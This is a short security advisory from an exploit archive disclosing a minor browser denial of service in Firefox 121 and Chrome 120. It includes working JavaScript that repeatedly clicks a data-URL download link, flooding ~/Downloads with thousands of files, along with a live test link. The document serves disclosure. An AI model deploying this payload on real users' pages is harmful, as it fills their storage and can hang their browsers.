Share
## https://sploitus.com/exploit?id=PACKETSTORM:176640
Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)  
  
Tested on: firefox 121 and chrome 120 on GNU/linux  
  
Date: Thu Jan 18 08:38:28 AM UTC 2024  
  
This is barely a DoS, but since it might affect Chrome too we decided  
to disclose it.  
  
If firefox user visits a specially crafted page, then firefox  
may create many files in `~/Downloads`,  
The user is notified about this in a small dialog, but there is  
no option to stop the downloads.  
The potential denial of service is that the user must manually  
delete the created files and this might be PITA especially on  
a phone.  
  
The code basically is:  
<pre>  
URL = "data:text/plain;,a";//can be very large with no net traffic  
link = document.createElement('a');  
link.href = URL;  
link.download = 'joro_';  
document.body.appendChild(link);  
function f() {  
if( !confirm("This will ruin your device with probability up to 199.99%"))  
return;  
setInterval("link.click();",1);//dobro  
}  
f();  
</pre>  
There is no network traffic and in about 90 seconds firefox 121 created  
3434 files at speed about 38 files/second.  
  
google chrome 120 prompts about multiple downloads, and if the user  
allows it, it creates files at speed of 4.2 files/second, but  
it gives modal prompts, which we couldn't close from the GUI and  
had to kill the process.  
  
[Test online][1]: if you are vulnerable  
  
[1]: https://j.ludost.net/download2.html  
  
--   
guninski